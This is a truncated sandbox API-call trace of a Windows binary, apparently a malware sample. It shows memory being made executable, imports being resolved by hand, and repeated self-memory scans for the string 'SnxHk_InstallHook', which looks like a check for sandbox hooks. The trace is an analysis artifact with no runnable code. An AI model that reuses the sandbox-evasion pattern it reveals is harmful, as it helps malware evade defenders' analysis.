[0040.676] VirtualProtect (in: lpAddress=0x1002e000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x8) returned 1 [0040.676] VirtualProtect (in: lpAddress=0x1002f000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x4) returned 1 [0040.676] VirtualProtect (in: lpAddress=0x10030000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x4) returned 1 [0040.676] VirtualProtect (in: lpAddress=0x10031000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x4) returned 1 [0040.676] VirtualProtect (in: lpAddress=0x10032000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x4) returned 1 [0040.677] VirtualProtect (in: lpAddress=0x10033000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x2) returned 1 [0040.677] VirtualProtect (in: lpAddress=0x10034000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x2) returned 1 [0040.677] VirtualProtect (in: lpAddress=0x10035000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x2) returned 1 [0040.677] VirtualProtect (in: lpAddress=0x10036000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x2) returned 1 [0040.677] VirtualProtect (in: lpAddress=0x10037000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x2) returned 1 [0040.677] VirtualProtect (in: lpAddress=0x10038000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x2) returned 1 [0040.677] VirtualProtect (in: lpAddress=0x10039000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x2) returned 1 [0040.677] VirtualProtect (in: lpAddress=0x1003a000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x2) returned 1 [0040.677] VirtualProtect (in: lpAddress=0x1003b000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x2) returned 1 [0040.677] VirtualProtect (in: lpAddress=0x1003c000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x2) returned 1 [0040.677] VirtualProtect (in: lpAddress=0x1003d000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x2) returned 1 [0040.677] VirtualProtect (in: lpAddress=0x1003e000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x2) returned 1 [0040.677] VirtualProtect (in: lpAddress=0x1003f000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x2) returned 1 [0040.677] VirtualProtect (in: lpAddress=0x10040000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x2) returned 1 [0040.677] VirtualProtect (in: lpAddress=0x10041000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x2) returned 1 [0040.677] VirtualProtect (in: lpAddress=0x10042000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x2) returned 1 [0040.677] VirtualProtect (in: lpAddress=0x10043000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x2) returned 1 [0040.677] VirtualProtect (in: lpAddress=0x10044000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18aa0c | out: lpflOldProtect=0x18aa0c*=0x2) returned 1 [0040.682] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76600000 [0040.683] GetProcAddress (hModule=0x76600000, lpProcName="HeapAlloc") returned 0x76f9e026 [0040.683] GetProcAddress (hModule=0x76600000, lpProcName="HeapReAlloc") returned 0x76fb1f6e [0040.683] GetProcAddress (hModule=0x76600000, lpProcName="HeapFree") returned 0x766114c9 [0040.683] GetProcAddress (hModule=0x76600000, lpProcName="VirtualAlloc") returned 0x76611856 [0040.683] GetProcAddress (hModule=0x76600000, lpProcName="EncodePointer") returned 0x76fb0fcb [0040.683] GetProcAddress (hModule=0x76600000, lpProcName="SetEnvironmentVariableA") returned 0x7661e331 [0040.683] GetProcAddress (hModule=0x76600000, lpProcName="FlushInstructionCache") returned 0x76614393 [0040.683] GetProcAddress (hModule=0x76600000, lpProcName="GetProcessHeap") returned 0x766114e9 [0040.683] GetProcAddress (hModule=0x76600000, lpProcName="UnhandledExceptionFilter") returned 0x7663772f [0040.684] GetProcAddress (hModule=0x76600000, lpProcName="ExitProcess") returned 0x76617a10 [0040.684] GetProcAddress (hModule=0x76600000, lpProcName="ReadProcessMemory") returned 0x7662cfcc [0040.684] GetProcAddress (hModule=0x76600000, lpProcName="GetSystemInfo") returned 0x766149ca [0040.684] GetProcAddress (hModule=0x76600000, lpProcName="GetCurrentProcess") returned 0x76611809 [0040.684] GetProcAddress (hModule=0x76600000, lpProcName="GetProcAddress") returned 0x76611222 [0040.684] GetProcAddress (hModule=0x76600000, lpProcName="Sleep") returned 0x766110ff [0040.684] GetProcAddress (hModule=0x76600000, lpProcName="GetModuleHandleA") returned 0x76611245 [0040.684] GetProcAddress (hModule=0x76600000, lpProcName="TerminateProcess") returned 0x7662d802 [0040.684] GetProcAddress (hModule=0x76600000, lpProcName="RtlUnwind") returned 0x7663d1c3 [0040.684] GetProcAddress (hModule=0x76600000, lpProcName="SetUnhandledExceptionFilter") returned 0x766187c9 [0040.684] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74ea0000 [0040.685] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptHashData") returned 0x74eadf36 [0040.685] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptCreateHash") returned 0x74eadf4e [0040.685] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptReleaseContext") returned 0x74eae124 [0040.685] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptDestroyHash") returned 0x74eadf66 [0040.685] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptAcquireContextW") returned 0x74eadf14 [0040.685] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptGetHashParam") returned 0x74eadf7e [0040.685] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x76a40000 [0040.685] GetProcAddress (hModule=0x76a40000, lpProcName="strlen") returned 0x76a543d3 [0040.685] GetProcAddress (hModule=0x76a40000, lpProcName="memset") returned 0x76a49790 [0040.685] VirtualProtect (in: lpAddress=0x10000000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x18aa24 | out: lpflOldProtect=0x18aa24*=0x40) returned 1 [0040.685] VirtualProtect (in: lpAddress=0x10001000, dwSize=0x1b64, flNewProtect=0x20, lpflOldProtect=0x18aa24 | out: lpflOldProtect=0x18aa24*=0x40) returned 1 [0040.686] VirtualProtect (in: lpAddress=0x10003000, dwSize=0x5a0, flNewProtect=0x2, lpflOldProtect=0x18aa24 | out: lpflOldProtect=0x18aa24*=0x40) returned 1 [0040.686] VirtualProtect (in: lpAddress=0x10004000, dwSize=0x3e6c0, flNewProtect=0x4, lpflOldProtect=0x18aa24 | out: lpflOldProtect=0x18aa24*=0x40) returned 1 [0040.686] VirtualProtect (in: lpAddress=0x10043000, dwSize=0x1b8, flNewProtect=0x2, lpflOldProtect=0x18aa24 | out: lpflOldProtect=0x18aa24*=0x40) returned 1 [0040.686] VirtualProtect (in: lpAddress=0x10044000, dwSize=0x151, flNewProtect=0x2, lpflOldProtect=0x18aa24 | out: lpflOldProtect=0x18aa24*=0x40) returned 1 [0040.686] GetSystemInfo (in: lpSystemInfo=0x18a9d4 | out: lpSystemInfo=0x18a9d4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0040.686] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x0, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x0, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x10000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0040.686] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x10000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x10000, AllocationBase=0x10000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x40000), ResultLength=0x0) returned 0x0 [0040.686] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x20000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x20000, AllocationBase=0x20000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000), ResultLength=0x0) returned 0x0 [0040.686] GetModuleHandleA (lpModuleName=0x0) returned 0x10000000 [0040.686] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0040.686] GetCurrentProcess () returned 0xffffffff [0040.687] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x10000, lpBuffer=0x2c42a60, nSize=0x10000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2c42a60*, lpNumberOfBytesRead=0x18a9ac*=0x10000) returned 1 [0040.690] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0040.690] GetCurrentProcess () returned 0xffffffff [0040.690] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40000, lpBuffer=0x5bf1b0, nSize=0x1000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x5bf1b0*, lpNumberOfBytesRead=0x18a9ac*=0x1000) returned 1 [0040.690] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0040.690] GetCurrentProcess () returned 0xffffffff [0040.690] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x190000, lpBuffer=0x2c42a60, nSize=0x4000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2c42a60*, lpNumberOfBytesRead=0x18a9ac*=0x4000) returned 1 [0040.691] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0040.691] GetCurrentProcess () returned 0xffffffff [0040.691] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x1a0000, lpBuffer=0x5bf1b0, nSize=0x1000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x5bf1b0*, lpNumberOfBytesRead=0x18a9ac*=0x1000) returned 1 [0040.691] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0040.691] GetCurrentProcess () returned 0xffffffff [0040.691] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x1b0000, lpBuffer=0x2ce0048, nSize=0x67000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2ce0048*, lpNumberOfBytesRead=0x18a9ac*=0x67000) returned 1 [0040.700] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0040.700] GetCurrentProcess () returned 0xffffffff [0040.700] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x2b0000, lpBuffer=0x2c42a60, nSize=0x7000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2c42a60*, lpNumberOfBytesRead=0x18a9ac*=0x7000) returned 1 [0040.701] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0040.701] GetCurrentProcess () returned 0xffffffff [0040.701] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x2c0000, lpBuffer=0x665438, nSize=0x2000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x665438*, lpNumberOfBytesRead=0x18a9ac*=0x2000) returned 1 [0040.701] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0040.701] GetCurrentProcess () returned 0xffffffff [0040.702] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x2d0000, lpBuffer=0x5bf1b0, nSize=0x1000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x5bf1b0*, lpNumberOfBytesRead=0x18a9ac*=0x1000) returned 1 [0040.702] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0040.702] GetCurrentProcess () returned 0xffffffff [0040.702] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x300000, lpBuffer=0x5bf1b0, nSize=0x1000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x5bf1b0*, lpNumberOfBytesRead=0x18a9ac*=0x1000) returned 1 [0040.702] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0040.702] GetCurrentProcess () returned 0xffffffff [0040.702] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x3d0000, lpBuffer=0x2e60020, nSize=0x188000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2e60020, lpNumberOfBytesRead=0x18a9ac) returned 0 [0040.702] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x558000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x558000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x18000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0040.702] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x570000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x570000, AllocationBase=0x570000, AllocationProtect=0x4, RegionSize=0x100000, State=0x1000, Protect=0x4, Type=0x20000), ResultLength=0x0) returned 0x0 [0040.702] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x670000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x670000, AllocationBase=0x670000, AllocationProtect=0x2, RegionSize=0x181000, State=0x1000, Protect=0x2, Type=0x40000), ResultLength=0x0) returned 0x0 [0040.702] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x7f1000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x7f1000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xf000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0040.703] GetModuleHandleA (lpModuleName=0x0) returned 0x10000000 [0040.703] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0040.703] GetCurrentProcess () returned 0xffffffff [0040.703] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x670000, lpBuffer=0x2ff0020, nSize=0x181000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2ff0020*, lpNumberOfBytesRead=0x18a9ac*=0x181000) returned 1 [0040.732] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0040.732] GetCurrentProcess () returned 0xffffffff [0040.732] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x800000, lpBuffer=0x2ff0020, nSize=0x1400000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2ff0020, lpNumberOfBytesRead=0x18a9ac) returned 0 [0040.883] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x1c00000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x1c00000, AllocationBase=0x1c00000, AllocationProtect=0x4, RegionSize=0x39000, State=0x2000, Protect=0x0, Type=0x20000), ResultLength=0x0) returned 0x0 [0040.883] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x1c39000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x1c39000, AllocationBase=0x1c00000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000), ResultLength=0x0) returned 0x0 [0040.883] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x1c3c000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x1c3c000, AllocationBase=0x1c00000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000), ResultLength=0x0) returned 0x0 [0040.883] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x1c40000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x1c40000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x70000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0040.883] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x1cb0000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x1cb0000, AllocationBase=0x1cb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000), ResultLength=0x0) returned 0x0 [0040.883] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x1cb1000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x1cb1000, AllocationBase=0x1cb0000, AllocationProtect=0x4, RegionSize=0x3f000, State=0x2000, Protect=0x0, Type=0x20000), ResultLength=0x0) returned 0x0 [0040.883] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x1cf0000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x1cf0000, AllocationBase=0x1cf0000, AllocationProtect=0x2, RegionSize=0x3f3000, State=0x1000, Protect=0x2, Type=0x40000), ResultLength=0x0) returned 0x0 [0040.883] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x20e3000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x20e3000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x9d000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0040.884] GetModuleHandleA (lpModuleName=0x0) returned 0x10000000 [0040.884] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0040.884] GetCurrentProcess () returned 0xffffffff [0040.884] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x1cf0000, lpBuffer=0x4400020, nSize=0x3f3000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x4400020*, lpNumberOfBytesRead=0x18a9ac*=0x3f3000) returned 1 [0040.965] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0040.965] GetCurrentProcess () returned 0xffffffff [0040.965] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x2220000, lpBuffer=0x4400020, nSize=0xdf000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x4400020*, lpNumberOfBytesRead=0x18a9ac*=0xdf000) returned 1 [0040.985] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0040.985] GetCurrentProcess () returned 0xffffffff [0040.986] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x2890000, lpBuffer=0x4400020, nSize=0x2cf000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x4400020*, lpNumberOfBytesRead=0x18a9ac*=0x2cf000) returned 1 [0041.062] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.062] GetCurrentProcess () returned 0xffffffff [0041.063] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x743f0000, lpBuffer=0x2ce0048, nSize=0x13000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2ce0048*, lpNumberOfBytesRead=0x18a9ac*=0x13000) returned 1 [0041.064] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.064] GetCurrentProcess () returned 0xffffffff [0041.064] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74410000, lpBuffer=0x20f0020, nSize=0x80000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x20f0020, lpNumberOfBytesRead=0x18a9ac) returned 0 [0041.064] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x74490000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x74490000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x10000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0041.065] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x744a0000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x744a0000, AllocationBase=0x744a0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.065] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x744a1000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x744a1000, AllocationBase=0x744a0000, AllocationProtect=0x80, RegionSize=0x3000, State=0x1000, Protect=0x20, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.065] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x744a4000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x744a4000, AllocationBase=0x744a0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.065] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x744a5000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x744a5000, AllocationBase=0x744a0000, AllocationProtect=0x80, RegionSize=0x3000, State=0x1000, Protect=0x2, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.065] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x744a8000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x744a8000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x8000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0041.067] GetModuleHandleA (lpModuleName=0x0) returned 0x10000000 [0041.067] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.067] GetCurrentProcess () returned 0xffffffff [0041.067] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x744a0000, lpBuffer=0x2c42a60, nSize=0x8000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2c42a60*, lpNumberOfBytesRead=0x18a9ac*=0x8000) returned 1 [0041.070] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.070] GetCurrentProcess () returned 0xffffffff [0041.070] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x744b0000, lpBuffer=0x2ce0048, nSize=0x5c000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2ce0048*, lpNumberOfBytesRead=0x18a9ac*=0x5c000) returned 1 [0041.077] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.077] GetCurrentProcess () returned 0xffffffff [0041.078] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74510000, lpBuffer=0x2ce0048, nSize=0x3f000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2ce0048*, lpNumberOfBytesRead=0x18a9ac*=0x3f000) returned 1 [0041.080] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.080] GetCurrentProcess () returned 0xffffffff [0041.080] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x745b0000, lpBuffer=0x2c42a60, nSize=0x9000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2c42a60*, lpNumberOfBytesRead=0x18a9ac*=0x9000) returned 1 [0041.082] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.082] GetCurrentProcess () returned 0xffffffff [0041.083] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x745c0000, lpBuffer=0x2c42a60, nSize=0xb000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2c42a60*, lpNumberOfBytesRead=0x18a9ac*=0xb000) returned 1 [0041.084] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.084] GetCurrentProcess () returned 0xffffffff [0041.084] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x745d0000, lpBuffer=0x2c42a60, nSize=0xf000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2c42a60*, lpNumberOfBytesRead=0x18a9ac*=0xf000) returned 1 [0041.085] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.085] GetCurrentProcess () returned 0xffffffff [0041.085] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x745e0000, lpBuffer=0x2c42a60, nSize=0x8000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2c42a60*, lpNumberOfBytesRead=0x18a9ac*=0x8000) returned 1 [0041.085] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.085] GetCurrentProcess () returned 0xffffffff [0041.086] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x745f0000, lpBuffer=0x2ce0048, nSize=0x17000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2ce0048*, lpNumberOfBytesRead=0x18a9ac*=0x17000) returned 1 [0041.088] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.088] GetCurrentProcess () returned 0xffffffff [0041.088] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74610000, lpBuffer=0x2ce0048, nSize=0x14000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2ce0048*, lpNumberOfBytesRead=0x18a9ac*=0x14000) returned 1 [0041.089] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.089] GetCurrentProcess () returned 0xffffffff [0041.090] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74630000, lpBuffer=0x2ce0048, nSize=0x29000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2ce0048*, lpNumberOfBytesRead=0x18a9ac*=0x29000) returned 1 [0041.093] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.093] GetCurrentProcess () returned 0xffffffff [0041.093] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74660000, lpBuffer=0x2c42a60, nSize=0x8000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2c42a60*, lpNumberOfBytesRead=0x18a9ac*=0x8000) returned 1 [0041.095] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.095] GetCurrentProcess () returned 0xffffffff [0041.095] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74670000, lpBuffer=0x2c42a60, nSize=0x7000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2c42a60*, lpNumberOfBytesRead=0x18a9ac*=0x7000) returned 1 [0041.095] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.095] GetCurrentProcess () returned 0xffffffff [0041.096] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74680000, lpBuffer=0x2ce0048, nSize=0x1c000, lpNumberOfBytesRead=0x18a9ac | 